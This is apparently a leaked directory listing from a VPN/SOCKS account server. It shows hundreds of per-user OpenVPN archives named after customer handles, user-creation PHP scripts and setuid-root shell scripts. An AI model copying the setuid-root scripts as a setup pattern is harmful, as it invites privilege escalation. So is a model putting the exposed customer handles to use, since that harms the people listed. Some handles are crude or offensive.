-rw-r--r--  1 root root  3408 Jul 15 21:27 Tronic24834_OPENVPN.tgz
-rw-r--r--  1 root root  3412 Jul 18 21:32 Tronic32029_OPENVPN.tgz
-rw-r--r--  1 root root  3604 May 17  2010 Tweaknap31697_OPENVPN.tgz
-rw-r--r--  1 root root  3417 Sep 16 14:41 Tzolli11813_OPENVPN.tgz
-rw-r--r--  1 root root  3414 Sep 17 00:26 Tzolli12805_OPENVPN.tgz
-rw-r--r--  1 root root  3634 Jul  2  2010 Tzolli31127_OPENVPN.tgz
-rw-r--r--  1 root root  3626 Jun  1  2010 Tzolli530_OPENVPN.tgz
-rw-r--r--  1 root root  3582 Oct 22 01:07 Ukash31388_OPENVPN.tgz
-rw-r--r--  1 root root  3581 Oct  5 15:59 WEEDtwo23015_OPENVPN.tgz
-rw-r--r--  1 root root  3557 Dec 14 17:42 WEEDtwo358_OPENVPN.tgz
-rw-r--r--  1 root root  3570 Oct 18 17:52 WalterW26039_OPENVPN.tgz
-rw-r--r--  1 root root  3567 Dec  1 14:47 WalterW5032_OPENVPN.tgz
-rw-r--r--  1 root root  3616 Jul 10 16:28 WeArEoNe5813_OPENVPN.tgz
-rw-r--r--  1 root root  3632 Jul  1  2010 Weichei4520239_OPENVPN.tgz
-rw-r--r--  1 root root  3609 Nov 21 22:43 Wursteintopf1171_OPENVPN.tgz
-rw-r--r--  1 root root  3614 Jul  9  2010 X3N0N8545_OPENVPN.tgz
-rw-r--r--  1 root root  3576 Nov  1 20:31 Xeral1887_OPENVPN.tgz
-rw-r--r--  1 root root  3578 Sep 13 21:52 Zerox8831175_OPENVPN.tgz
-rw-r--r--  1 root root  3571 Nov  7 19:55 Zorator17384_OPENVPN.tgz
-rw-r--r--  1 root root  3412 Jul 17 18:58 Zuraaa30069_OPENVPN.tgz
-rw-r--r--  1 root root   387 Sep 17 00:14 addSSHuser.php
-rw-r--r--  1 root root   280 Sep 17 00:14 addVPNuser.php
-rw-r--r--  1 root root  3574 Sep  1 00:39 adios21334_OPENVPN.tgz
-rw-r--r--  1 root root  3610 Nov 27 13:43 adminadmin663_OPENVPN.tgz
-rw-r--r--  1 root root  3395 Dec 24 05:38 analytics23444_OPENVPN.tgz
-rw-r--r--  1 root root  3408 Dec 18 08:46 andreas741128201_OPENVPN.tgz
-rw-r--r--  1 root root  3411 Sep 25 10:41 anonymius696_OPENVPN.tgz
-rw-r--r--  1 root root  3430 Jul  6  2010 anoobis20036_OPENVPN.tgz
-rw-r--r--  1 root root  3628 Jun 18  2010 asd12322807_OPENVPN.tgz
-rw-r--r--  1 root root  3411 Aug  2 22:29 asd12326649_OPENVPN.tgz
-rw-r--r--  1 root root  3414 Aug  3 18:40 asd12328521_OPENVPN.tgz
-rw-r--r--  1 root root  3621 Jun 25  2010 asd1233886_OPENVPN.tgz
-rw-r--r--  1 root root  3415 Jul 20 19:54 asdfg12345627545_OPENVPN.tgz
-rw-r--r--  1 root root  3405 Nov  2 15:47 asdfghjkl27874_OPENVPN.tgz
-rw-r--r--  1 root root  3564 Dec 10 07:39 awesome50_OPENVPN.tgz
-rw-r--r--  1 root root  3589 Nov  9 15:31 b0uNz18610_OPENVPN.tgz
-rw-r--r--  1 root root  3594 Dec  2 22:03 b111124378_OPENVPN.tgz
-rw-r--r--  1 root root  3411 Oct 24 03:30 b14ckf1ag13016_OPENVPN.tgz
-rw-r--r--  1 root root  3411 Dec 15 15:30 b14ckf1ag14907_OPENVPN.tgz
-rw-r--r--  1 root root  3579 Oct  4 17:00 b7231244_OPENVPN.tgz
-rw-r--r--  1 root root  3578 Nov 21 03:08 b72317220_OPENVPN.tgz
-rw-r--r--  1 root root  3579 Oct 20 04:19 b72337515_OPENVPN.tgz
-rw-r--r--  1 root root  3596 Nov  9 01:37 bLackftw19898791_OPENVPN.tgz
-rw-r--r--  1 root root  3602 Oct 11 20:18 badboy10125461_OPENVPN.tgz
-rw-r--r--  1 root root  3579 Jul 17 23:40 bambuss3686_OPENVPN.tgz
-rw-r--r--  1 root root  3419 Sep  9 20:38 basics14055_OPENVPN.tgz
-rw-r--r--  1 root root  3581 Dec 27 16:44 becks1088_OPENVPN.tgz
-rw-r--r--  1 root root  3587 Nov  5 18:26 becks1540_OPENVPN.tgz
-rw-r--r--  1 root root  3406 Nov  7 19:27 bergi181219604_OPENVPN.tgz
-rw-r--r--  1 root root  3576 Aug 15 01:15 bigtwin25561_OPENVPN.tgz
-rw-r--r--  1 root root  3397 Jul 13 12:56 blackcell12902_OPENVPN.tgz
-rw-r--r--  1 root root  3641 Jun 11  2010 blackcell1900_OPENVPN.tgz
-rw-r--r--  1 root root  3604 Aug 14 18:25 bloodyrain6388_OPENVPN.tgz
-rw-r--r--  1 root root  3604 Jun  3  2010 bluballa28446_OPENVPN.tgz
-rw-r--r--  1 root root  3584 Nov 10 20:41 bobby11515_OPENVPN.tgz
-rw-r--r--  1 root root  3576 Aug 12 14:55 bobby15402_OPENVPN.tgz
-rw-r--r--  1 root root  3582 Sep 17 03:28 bobby1638_OPENVPN.tgz
-rw-r--r--  1 root root  3583 Dec 11 14:06 bobby7804_OPENVPN.tgz
-rw-r--r--  1 root root  3583 Oct 18 18:37 cafe116337_OPENVPN.tgz
-rw-r--r--  1 root root  3604 Aug 14 21:49 cardercarder18567_OPENVPN.tgz
-rw-r--r--  1 root root  3412 Jul  7  2010 cardercarder21402_OPENVPN.tgz
-rw-r--r--  1 root root  3593 Dec 12 19:16 cardercarder31297_OPENVPN.tgz
-rw-r--r--  1 root root  3588 Sep 14 07:54 cardercarder6893_OPENVPN.tgz
-rw-r--r--  1 root root  3585 Oct 28 02:05 cardercarder8070_OPENVPN.tgz
-rw-r--r--  1 root root  3416 Oct 15 01:29 carlos3914_OPENVPN.tgz
-rw-r--r--  1 root root  3564 Nov 23 05:29 cayenne10018_OPENVPN.tgz
-rw-r--r--  1 root root  3605 Jul 21 17:29 checka1220438_OPENVPN.tgz
-rw-r--r--  1 root root  3404 Dec 28 14:48 chessy33331564_OPENVPN.tgz
-rw-r--r--  1 root root  3406 Sep 29 16:28 chessy3333215_OPENVPN.tgz
-rw-r--r--  1 root root  3403 Nov 26 12:28 chiller133713287_OPENVPN.tgz
-rw-r--r--  1 root root  3421 Dec 29 11:22 chiller13378063_OPENVPN.tgz
-rw-r--r--  1 root root  3409 Sep 10 00:34 chip998558_OPENVPN.tgz
-rw-r--r--  1 root root  3611 Dec  7 09:16 conviction28712_OPENVPN.tgz
-rw-r--r--  1 root root  3604 Oct 28 01:20 conviction6444_OPENVPN.tgz
-rw-r--r--  1 root root  3623 Jul  8  2010 coolio13949_OPENVPN.tgz
-rw-r--r--  1 root root  3575 Sep  5 22:43 crack9164_OPENVPN.tgz
-rwsr-sr-x  1 root root   700 May  9  2010 createSSHsocks.sh
-rwsr-sr-x  1 root root   518 May 11  2010 createVPN.sh
-rw-r--r--  1 root root  3412 Jul 17 20:49 crypt012465_OPENVPN.tgz
-rw-r--r--  1 root root  3569 Oct 27 16:38 cryptus4764_OPENVPN.tgz
-rw-r--r--  1 root root  3598 Sep 11 19:15 cunit15618415_OPENVPN.tgz
-rw-r--r--  1 root root  3590 Aug 11 14:44 cunit15619893_OPENVPN.tgz
-rw-r--r--  1 root root  3593 Nov  9 23:03 cunit15624106_OPENVPN.tgz
-rw-r--r--  1 root root  3565 Jul 23 15:14 d0ne0ne32695_OPENVPN.tgz
-rw-r--r--  1 root root  3607 Dec 30 22:11 darkt0wn15874_OPENVPN.tgz
-rw-r--r--  1 root root  3611 Nov 26 19:37 darkt0wn3662_OPENVPN.tgz
-rw-r--r--  1 root root  3423 Jun 11  2010 dasemih10582_OPENVPN.tgz
-rw-r--r--  1 root root  3604 Aug  9 03:01 denniswolf15380_OPENVPN.tgz
-rw-r--r--  1 root root  3611 Sep  8 17:06 denniswolf975_OPENVPN.tgz
-rw-r--r--  1 root root  3611 May 31  2010 desaster30502_OPENVPN.tgz
-rw-r--r--  1 root root  3609 Jul 10 15:33 det0x10826_OPENVPN.tgz
-rw-r--r--  1 root root  3614 Jun  6  2010 det0x25144_OPENVPN.tgz
-rw-r--r--  1 root root  3607 May 16  2010 det0x6693_OPENVPN.tgz
-rw-r--r--  1 root root  3586 Dec  5 20:40 dex9030410_OPENVPN.tgz
-rw-r--r--  1 root root  3405 Aug 29 19:38 dinara3242_OPENVPN.tgz
-rw-r--r--  1 root root  3603 Aug 18 17:42 docscanner11883_OPENVPN.tgz
-rw-r--r--  1 root root  3600 Dec 10 20:19 docscanner15891_OPENVPN.tgz
-rw-r--r--  1 root root  3612 Oct 24 17:48 docscanner6161_OPENVPN.tgz
-rw-r--r--  1 root root  3602 Oct 22 14:14 dome250310063_OPENVPN.tgz
-rw-r--r--  1 root root  3407 Aug 24 16:08 donkey17577_OPENVPN.tgz
-rw-r--r--  1 root root  3594 Nov 24 19:26 dpgc201011939_OPENVPN.tgz
-rw-r--r--  1 root root  3422 Nov  7 23:02 dreckz7739_OPENVPN.tgz
-rw-r--r--  1 root root  3605 Nov 22 18:25 drhandel18818_OPENVPN.tgz
-rw-r--r--  1 root root  3410 Nov 27 11:04 drweed7100_OPENVPN.tgz
-rw-r--r--  1 root root  3579 Nov 19 01:43 duden16363_OPENVPN.tgz
-rw-r--r--  1 root root  3578 Oct 27 22:52 dudex20927_OPENVPN.tgz
-rw-r--r--  1 root root  3586 Sep 12 18:50 dudex29255_OPENVPN.tgz
-rw-r--r--  1 root root  3439 Jun  1  2010 e5e1llo30858_OPENVPN.tgz
-rw-r--r--  1 root root  3573 Nov  4 23:11 eater15817_OPENVPN.tgz
-rw-r--r--  1 root root  3418 Oct 27 19:21 eddinc12916_OPENVPN.tgz
-rw-r--r--  1 root root  3581 Jan  3 15:05 elektro27327_OPENVPN.tgz
-rw-r--r--  1 root root  3560 Nov 30 15:30 elektro6996_OPENVPN.tgz
-rw-r--r--  1 root root  3585 Jul 15 00:05 elit327890_OPENVPN.tgz
-rw-r--r--  1 root root  3412 Nov 18 12:14 epoepo25324_OPENVPN.tgz
-rw-r--r--  1 root root  3600 Jul 14 20:26 f1resp1n9199_OPENVPN.tgz
-rw-r--r--  1 root root  3589 Nov  8 01:59 finnq10545_OPENVPN.tgz
-rw-r--r--  1 root root  3426 Oct 23 21:19 fluxay4913_OPENVPN.tgz
-rw-r--r--  1 root root  3576 Sep  4 01:34 forza12423_OPENVPN.tgz
-rw-r--r--  1 root root  3599 Aug 24 21:30 fragezeichen14241_OPENVPN.tgz
-rw-r--r--  1 root root  3602 Oct  5 16:36 fragezeichen3542_OPENVPN.tgz
-rw-r--r--  1 root root  3603 Nov 26 23:39 frankylo18404_OPENVPN.tgz
-rw-r--r--  1 root root  3423 Nov  6 03:30 freaky11488_OPENVPN.tgz
-rw-r--r--  1 root root  3406 Nov 29 12:11 freshestman14998_OPENVPN.tgz
-rw-r--r--  1 root root  3416 Sep  7 02:44 freshestman20055_OPENVPN.tgz
-rw-r--r--  1 root root  3410 Oct 15 15:11 freshestman28233_OPENVPN.tgz
-rw-r--r--  1 root root  3611 Nov 16 01:27 fuckdawn12660_OPENVPN.tgz
-rw-r--r--  1 root root  3417 Jul 20 01:30 galaxi12741_OPENVPN.tgz
-rw-r--r--  1 root root  3410 Jul 19 22:52 galaxi15585_OPENVPN.tgz
-rw-r--r--  1 root root  3418 Oct  2 23:53 galaxi18086_OPENVPN.tgz
-rw-r--r--  1 root root  3411 Oct 30 02:40 gehtes5036_OPENVPN.tgz
-rw-r--r--  1 root root  3408 Oct 28 05:45 genetik1015054_OPENVPN.tgz
-rw-r--r--  1 root root  3606 Jun  8  2010 godfella23150_OPENVPN.tgz
-rw-r--r--  1 root root  3418 Nov  3 00:53 ground22054_OPENVPN.tgz
-rw-r--r--  1 root root  3577 Sep 22 02:09 groundy30694_OPENVPN.tgz
-rw-r--r--  1 root root  3423 Aug  4 00:04 h2d2e218599_OPENVPN.tgz
-rw-r--r--  1 root root  3590 Aug  6 19:39 h3l0x29397_OPENVPN.tgz
-rw-r--r--  1 root root  3609 Jun 28  2010 h3l0x3097_OPENVPN.tgz
-rw-r--r--  1 root root  3612 May 27  2010 h3l0x31602_OPENVPN.tgz
-rw-r--r--  1 root root  3590 Oct 16 21:20 h3l0x32259_OPENVPN.tgz
-rw-r--r--  1 root root  3576 Sep  6 23:03 h3l0x4320_OPENVPN.tgz
-rw-r--r--  1 root root  3416 Dec  6 13:04 habadu5745_OPENVPN.tgz
-rw-r--r--  1 root root  3406 Sep 22 11:39 hackbart231851_OPENVPN.tgz
-rw-r--r--  1 root root  3406 Nov 13 22:57 hackbart24778_OPENVPN.tgz
-rw-r--r--  1 root root  3607 Oct 31 23:11 hackoman8853_OPENVPN.tgz
-rw-r--r--  1 root root  3592 Aug 18 15:47 haddemann1235295_OPENVPN.tgz
-rw-r--r--  1 root root  3593 Jul 12 15:15 hallo12322143_OPENVPN.tgz
-rw-r--r--  1 root root  3416 Sep  4 01:51 hallo50505023476_OPENVPN.tgz
-rw-r--r--  1 root root  3596 Nov 28 20:53 hans200020336_OPENVPN.tgz
-rw-r--r--  1 root root  3407 Dec  4 19:35 hanshans12322721_OPENVPN.tgz
-rw-r--r--  1 root root  3406 Sep 18 18:05 hanswurst4277_OPENVPN.tgz
-rw-r--r--  1 root root  3406 Nov 20 14:42 hanswurst961_OPENVPN.tgz
-rw-r--r--  1 root root  3615 Nov  4 02:00 haooosii22019_OPENVPN.tgz
-rw-r--r--  1 root root  3628 Jul  8  2010 hasenp0wer1224_OPENVPN.tgz
-rw-r--r--  1 root root  3412 Jul 12 16:53 hexst4tic15575_OPENVPN.tgz
-rw-r--r--  1 root root  3421 Nov  6 17:30 hexst4tic20328_OPENVPN.tgz
-rw-r--r--  1 root root  3413 Sep 25 12:59 hexst4tic22131_OPENVPN.tgz
-rw-r--r--  1 root root  3391 Aug 23 16:21 hexst4tic24446_OPENVPN.tgz
-rw-r--r--  1 root root  3635 Jun  9  2010 hexst4tic31381_OPENVPN.tgz
-rw-r--r--  1 root root  3396 Jul 12 02:43 hexst4tic7086_OPENVPN.tgz
-rw-r--r--  1 root root  3396 Oct 26 02:49 heyhey12325893_OPENVPN.tgz
-rw-r--r--  1 root root  3583 Jan  2 23:36 hi31757_OPENVPN.tgz
-rw-r--r--  1 root root  3609 Dec  8 16:47 hung23046577_OPENVPN.tgz
-rw-r--r--  1 root root  3404 Oct 20 00:23 hushbaits3027_OPENVPN.tgz
-rw-r--r--  1 root root  3407 Dec  1 09:21 hushbaits8016_OPENVPN.tgz
-rw-r--r--  1 root root  3437 Jul  2  2010 ibrains20948_OPENVPN.tgz
-rw-r--r--  1 root root  3564 Nov 27 22:57 illegal9593_OPENVPN.tgz
-rw-r--r--  1 root root     3 May 11  2010 index.htm
-rw-r--r--  1 root root     2 Sep 17 03:05 index.html
-rw-r--r--  1 root root  3634 Jul 11 16:09 inexcussus16748_OPENVPN.tgz
-rw-r--r--  1 root root  3574 Jul 25 20:18 j9ker8731371_OPENVPN.tgz
-rw-r--r--  1 root root  3567 Oct 30 17:44 jack12330743_OPENVPN.tgz
-rw-r--r--  1 root root  3403 Aug  5 00:16 jiansa17539_OPENVPN.tgz
-rw-r--r--  1 root root  3601 Nov 25 20:03 johan12328730_OPENVPN.tgz
-rw-r--r--  1 root root  3609 Jun 18  2010 johny3288_OPENVPN.tgz
-rw-r--r--  1 root root  3584 Aug 20 15:20 jokereloaded3875_OPENVPN.tgz
-rw-r--r--  1 root root  3607 May 11  2010 juden20060_OPENVPN.tgz
-rw-r--r--  1 root root  3593 Nov 28 11:39 juegoray1353_OPENVPN.tgz
-rw-r--r--  1 root root  3408 Nov  9 17:01 juicestin20280_OPENVPN.tgz
-rw-r--r--  1 root root  3423 Nov 21 20:15 juliasutter2672_OPENVPN.tgz
-rw-r--r--  1 root root  3420 Oct 24 18:42 kaiser6131_OPENVPN.tgz
-rw-r--r--  1 root root  3561 Jul 16 01:38 kaliber14521_OPENVPN.tgz
-rw-r--r--  1 root root  3583 Dec 10 21:41 kalle4534_OPENVPN.tgz
-rw-r--r--  1 root root  3619 Jul  8  2010 kdkdkd23140_OPENVPN.tgz
-rw-r--r--  1 root root  3396 Dec 10 19:17 kevin4ual20601_OPENVPN.tgz
-rw-r--r--  1 root root  3614 May 17  2010 keystyle14572_OPENVPN.tgz
-rw-r--r--  1 root root  3397 Oct 22 02:19 kingding114185_OPENVPN.tgz
-rw-r--r--  1 root root  3573 Dec 12 17:04 kingpok30006_OPENVPN.tgz
-rw-r--r--  1 root root  3577 Oct 19 14:30 kirmi16980_OPENVPN.tgz
-rw-r--r--  1 root root  3579 Sep 10 11:50 kirmi17897_OPENVPN.tgz
-rw-r--r--  1 root root  3583 Aug  3 12:32 kirmi21804_OPENVPN.tgz
-rw-r--r--  1 root root  3584 Dec  8 12:39 kirmi24669_OPENVPN.tgz
-rw-r--r--  1 root root  3394 Jul 19 15:09 kitanamea14934_OPENVPN.tgz
-rw-r--r--  1 root root  3564 Sep 13 20:16 klaudio18199_OPENVPN.tgz
-rw-r--r--  1 root root  3572 Oct 13 23:44 knochen12287_OPENVPN.tgz
-rw-r--r--  1 root root  3581 Aug 26 17:50 kobra25894_OPENVPN.tgz
-rw-r--r--  1 root root  3584 Nov 11 19:06 kobra28854_OPENVPN.tgz
-rw-r--r--  1 root root  3401 Sep  2 22:18 koksi13379157_OPENVPN.tgz
-rw-r--r--  1 root root  3606 Sep 22 23:26 kollegah14227_OPENVPN.tgz
-rw-r--r--  1 root root  3603 Nov 19 17:54 kollegah19696_OPENVPN.tgz
-rw-r--r--  1 root root  3604 Jul 15 18:05 kollegah9876_OPENVPN.tgz
-rw-r--r--  1 root root  3412 Jul 21 15:55 kopfnuss1233390_OPENVPN.tgz
-rw-r--r--  1 root root  3578 Nov 30 09:05 kstARRR29974_OPENVPN.tgz
-rw-r--r--  1 root root  3416 Dec 15 15:22 lacezl11349_OPENVPN.tgz
-rw-r--r--  1 root root  3572 Jul 15 14:07 lafesse135_OPENVPN.tgz
-rw-r--r--  1 root root  3573 Jul 17 21:19 larusso24610_OPENVPN.tgz
-rw-r--r--  1 root root  3605 Dec 10 05:07 latestnews13082_OPENVPN.tgz
-rw-r--r--  1 root root  3603 Oct 30 07:58 latestnews14060_OPENVPN.tgz
-rw-r--r--  1 root root  3418 May 15  2010 letharg30647_OPENVPN.tgz
-rw-r--r--  1 root root  3601 Jul 20 01:31 levision22813_OPENVPN.tgz
-rw-r--r--  1 root root  3595 Jul 19 01:07 levision26609_OPENVPN.tgz
drwxr-xr-x  2 root root  4096 Sep 17 03:05 lighttpd
-rw-r--r--  1 root root  3621 May 14  2010 lilg9427854_OPENVPN.tgz
-rw-r--r--  1 root root  3570 Jul 29 03:31 lolilol5992_OPENVPN.tgz
-rw-r--r--  1 root root  3589 Oct  1 00:06 loopi2628_OPENVPN.tgz
-rw-r--r--  1 root root  3599 Sep  5 22:47 lorenzstyler30043_OPENVPN.tgz
-rw-r--r--  1 root root  3588 Sep  9 15:14 lpboy15438_OPENVPN.tgz
-rw-r--r--  1 root root  3584 Nov 28 11:20 lpboy32147_OPENVPN.tgz
-rw-r--r--  1 root root  3583 Dec 21 20:30 luden29299_OPENVPN.tgz
-rw-r--r--  1 root root  3608 Jul 11 17:42 lykantos5842_OPENVPN.tgz
-rw-r--r--  1 root root  3605 Dec  2 11:04 mablutze15734_OPENVPN.tgz
-rw-r--r--  1 root root  3614 Jan  2 11:48 mablutze20061_OPENVPN.tgz
-rw-r--r--  1 root root  3618 Jul  2  2010 maddin9319817_OPENVPN.tgz
-rw-r--r--  1 root root  3582 Nov  1 16:20 makko10328_OPENVPN.tgz
-rw-r--r--  1 root root  3585 Aug 13 22:07 makko15206_OPENVPN.tgz
-rw-r--r--  1 root root  3616 Jun 12  2010 makko27543_OPENVPN.tgz
-rw-r--r--  1 root root  3606 Dec 19 12:10 malakas23496_OPENVPN.tgz
-rw-r--r--  1 root root  3402 Oct 26 03:21 malakas32654_OPENVPN.tgz
-rw-r--r--  1 root root  3570 Dec  5 13:21 malikop20421_OPENVPN.tgz
-rw-r--r--  1 root root  3602 Aug  8 02:15 mani199323876_OPENVPN.tgz
-rw-r--r--  1 root root  3577 Jul 13 00:29 maury27248_OPENVPN.tgz
-rw-r--r--  1 root root  3582 Aug 20 18:57 mcott19555_OPENVPN.tgz
-rw-r--r--  1 root root  3572 Oct  6 18:19 mcott7073_OPENVPN.tgz
-rw-r--r--  1 root root  3587 Jul 13 11:39 mcott9631_OPENVPN.tgz
-rw-r--r--  1 root root  3566 Aug 25 06:39 mesrine15658_OPENVPN.tgz
-rw-r--r--  1 root root  3576 Oct 12 18:34 micki2219130_OPENVPN.tgz
-rw-r--r--  1 root root  3583 Oct  4 19:37 mieze25868_OPENVPN.tgz
-rw-r--r--  1 root root  3604 Jul 30 23:15 mrfranzi20317_OPENVPN.tgz
-rw-r--r--  1 root root  3583 Jul 18 22:23 murth934_OPENVPN.tgz
-rw-r--r--  1 root root  3405 Oct 17 04:31 muruk20094696_OPENVPN.tgz
-rw-r--r--  1 root root  3611 Dec 17 13:08 muschigirl23085_OPENVPN.tgz
-rw-r--r--  1 root root  3609 Sep 22 12:38 muschigirl28807_OPENVPN.tgz
-rw-r--r--  1 root root  3570 Oct  4 22:31 n1C3A1r22801_OPENVPN.tgz
-rw-r--r--  1 root root  3607 Nov 26 13:10 n3ot0xin7144_OPENVPN.tgz
-rw-r--r--  1 root root  3409 Dec 21 21:57 nate2331513_OPENVPN.tgz
-rw-r--r--  1 root root  3615 Jun  8  2010 navyraiser2256_OPENVPN.tgz
-rw-r--r--  1 root root  3585 Aug 25 00:32 nemiz8610_OPENVPN.tgz
-rw-r--r--  1 root root  3635 Jun  9  2010 nightmar330255_OPENVPN.tgz
-rw-r--r--  1 root root  3621 Jul 11 18:06 numo874898_OPENVPN.tgz
-rw-r--r--  1 root root  3592 Dec  2 14:11 obama12323355_OPENVPN.tgz
-rw-r--r--  1 root root  3613 Jun 11  2010 obama12325666_OPENVPN.tgz
-rw-r--r--  1 root root  3601 Oct 15 20:31 obama12325914_OPENVPN.tgz
-rw-r--r--  1 root root  3420 Dec 19 18:26 oicw913539_OPENVPN.tgz
-rw-r--r--  1 root root  3565 Aug 11 00:48 oxford123948_OPENVPN.tgz
-rw-r--r--  1 root root  3629 Jun  2  2010 p0rt3m22208_OPENVPN.tgz
-rw-r--r--  1 root root  3411 Nov  5 01:41 pURRRR806_OPENVPN.tgz
-rw-r--r--  1 root root  3583 Dec  6 07:28 pan1c17070_OPENVPN.tgz
-rw-r--r--  1 root root  3593 Oct 26 10:28 pan1c31582_OPENVPN.tgz
-rw-r--r--  1 root root  3609 May 25  2010 pann021887_OPENVPN.tgz
-rw-r--r--  1 root root  3406 Dec  7 22:03 papa421249_OPENVPN.tgz
-rw-r--r--  1 root root  3432 Jun 14  2010 paranoy21693_OPENVPN.tgz
-rw-r--r--  1 root root  3415 Dec  1 18:16 peters7031_OPENVPN.tgz
-rw-r--r--  1 root root  3618 Jun  8  2010 plu5554340_OPENVPN.tgz
-rw-r--r--  1 root root  3613 Jun 15  2010 powerarm9390_OPENVPN.tgz
-rw-r--r--  1 root root  3408 Jul 16 00:19 puttin29618_OPENVPN.tgz
-rw-r--r--  1 root root  3575 Nov 22 18:53 r0fLyyy20540_OPENVPN.tgz
-rw-r--r--  1 root root  3601 Jul 20 20:45 recoilcontrol13838_OPENVPN.tgz
-rw-r--r--  1 root root  3601 Oct 31 05:55 recoilcontrol14436_OPENVPN.tgz
-rw-r--r--  1 root root  3605 Jul 20 23:48 recoilcontrol16539_OPENVPN.tgz
-rw-r--r--  1 root root  3589 Jul 20 20:45 recoilcontrol20256_OPENVPN.tgz
-rw-r--r--  1 root root  3595 Aug 24 23:41 recoilcontrol20435_OPENVPN.tgz
-rw-r--r--  1 root root  3595 Sep 25 22:59 recoilcontrol22600_OPENVPN.tgz
-rw-r--r--  1 root root  3602 Dec 10 06:48 recoilcontrol24867_OPENVPN.tgz
-rw-r--r--  1 root root  3578 Dec  7 12:24 reideen31055_OPENVPN.tgz
-rw-r--r--  1 root root  3565 Oct 27 16:49 reideen4694_OPENVPN.tgz
-rw-r--r--  1 root root  3429 Jun 13  2010 rew133711075_OPENVPN.tgz
-rw-r--r--  1 root root  3406 Dec  4 15:25 rich9024721_OPENVPN.tgz
-rw-r--r--  1 root root  3586 Dec 19 15:48 ripit25423_OPENVPN.tgz
-rw-r--r--  1 root root  3392 Sep 25 15:40 romulus8910580_OPENVPN.tgz
-rw-r--r--  1 root root  3606 Jun  5  2010 s1cks1ck7058_OPENVPN.tgz
-rw-r--r--  1 root root  3425 Jun 27  2010 saidone3692_OPENVPN.tgz
-rw-r--r--  1 root root  3432 Jul 10 10:52 santaly22171_OPENVPN.tgz
-rw-r--r--  1 root root  3428 May 12  2010 schmali30094_OPENVPN.tgz
-rw-r--r--  1 root root  3421 Jul  5  2010 schmali8853_OPENVPN.tgz
-rw-r--r--  1 root root  3589 Nov 15 21:35 sh0ck11639_OPENVPN.tgz
-rw-r--r--  1 root root  3571 Nov  1 01:54 shitpro46_OPENVPN.tgz
-rw-r--r--  1 root root  3604 Aug 26 22:09 shizomitzu29204_OPENVPN.tgz
-rw-r--r--  1 root root  3586 Dec  3 09:02 shore17470_OPENVPN.tgz
-rw-r--r--  1 root root  3407 Dec  7 14:34 sidosido1233174_OPENVPN.tgz
-rw-r--r--  1 root root  3613 Jul 22 20:39 sirmaliq9030397_OPENVPN.tgz
-rw-r--r--  1 root root  3407 Dec  2 07:36 slic3menic38769_OPENVPN.tgz
-rw-r--r--  1 root root  3411 Nov 10 22:47 snowghost17906_OPENVPN.tgz
-rw-r--r--  1 root root  3561 Nov 28 08:57 someone1895_OPENVPN.tgz
-rw-r--r--  1 root root  3434 Jun 25  2010 someone22369_OPENVPN.tgz
-rw-r--r--  1 root root  3593 Aug  4 23:47 souliloquist11153_OPENVPN.tgz
-rw-r--r--  1 root root  3423 Jul  4  2010 souliloquist12695_OPENVPN.tgz
-rw-r--r--  1 root root  3594 Aug  4 23:48 souliloquist25034_OPENVPN.tgz
-rw-r--r--  1 root root  3586 Nov  8 03:26 spran32726_OPENVPN.tgz
-rw-r--r--  1 root root 30730 Jan  7 19:07 sshCreateLog
-rw-r--r--  1 root root  3579 Aug 15 01:11 st0ne24184_OPENVPN.tgz
-rw-r--r--  1 root root  3573 Oct 31 00:13 stage666761_OPENVPN.tgz
-rw-r--r--  1 root root  3409 Aug  2 21:41 stevy265130526_OPENVPN.tgz
-rw-r--r--  1 root root  3568 Oct 14 22:12 store2410563_OPENVPN.tgz
-rw-r--r--  1 root root  3600 Sep  7 14:57 stronger8718968_OPENVPN.tgz
-rw-r--r--  1 root root  3419 Oct  4 01:35 styler12729_OPENVPN.tgz
-rw-r--r--  1 root root  3421 Nov 28 15:10 styles16225_OPENVPN.tgz
-rw-r--r--  1 root root  3424 Oct 18 07:43 styles18650_OPENVPN.tgz
-rw-r--r--  1 root root  3604 Sep 29 17:37 suc4life19475_OPENVPN.tgz
-rw-r--r--  1 root root  3597 Aug 24 20:28 suc4life9834_OPENVPN.tgz
-rw-r--r--  1 root root  3625 Jun 20  2010 sudeki25957_OPENVPN.tgz
-rw-r--r--  1 root root  3572 Dec 23 13:58 sunrise20870_OPENVPN.tgz
-rw-r--r--  1 root root  3401 Nov 29 12:31 supersixten16431_OPENVPN.tgz
-rw-r--r--  1 root root  3582 Nov  8 19:05 t0xus32177_OPENVPN.tgz
-rw-r--r--  1 root root  3590 Sep  2 23:25 t0xus6444_OPENVPN.tgz
-rw-r--r--  1 root root  3400 Nov 24 21:34 tahBOUNTY24202_OPENVPN.tgz
-rw-r--r--  1 root root  3590 Nov 12 19:12 tanjo21492_OPENVPN.tgz
-rw-r--r--  1 root root  3576 Sep  9 18:20 tanjo28945_OPENVPN.tgz
-rw-r--r--  1 root root  3564 Nov 27 10:06 termate24530_OPENVPN.tgz
-rw-r--r--  1 root root     4 Sep 16 23:51 test
-rw-r--r--  1 root root  3575 Dec  5 09:06 test5699246_OPENVPN.tgz
-rw-r--r--  1 root root  3587 Dec 29 19:18 teste8025_OPENVPN.tgz
-rw-r--r--  1 root root  3623 Jun 11  2010 th3sh4dow15637_OPENVPN.tgz
-rw-r--r--  1 root root  3412 Aug 29 03:36 th3sh4dow26538_OPENVPN.tgz
-rw-r--r--  1 root root  3404 Jul 29 01:36 th3sh4dow7901_OPENVPN.tgz
-rw-r--r--  1 root root  3427 Nov  1 18:55 theDog31533_OPENVPN.tgz
-rw-r--r--  1 root root  3620 May 17  2010 theaSh5027_OPENVPN.tgz
-rw-r--r--  1 root root  3421 Jan  3 20:24 thehen8300_OPENVPN.tgz
-rw-r--r--  1 root root  3401 Nov 29 06:13 tijgertje12595_OPENVPN.tgz
-rw-r--r--  1 root root  3608 May 13  2010 traden9010098_OPENVPN.tgz
-rw-r--r--  1 root root  3418 Nov  8 02:41 tripit30242_OPENVPN.tgz
-rw-r--r--  1 root root  3612 Oct 21 03:49 turboprinz18543_OPENVPN.tgz
-rw-r--r--  1 root root  3579 Oct 19 23:35 twist2275_OPENVPN.tgz
-rw-r--r--  1 root root  3430 May 31  2010 ucitsme12769_OPENVPN.tgz
-rw-r--r--  1 root root  3610 Nov 24 22:52 ultrawilli21542_OPENVPN.tgz
-rw-r--r--  1 root root  3609 Oct 15 00:46 upperfreak1495_OPENVPN.tgz
-rw-r--r--  1 root root  3575 Jul 14 13:30 vpn2420339_OPENVPN.tgz
-rw-r--r--  1 root root  3580 Nov  3 20:57 vpn2429681_OPENVPN.tgz
-rw-r--r--  1 root root 22174 Jan  4 20:31 vpnCreateLog
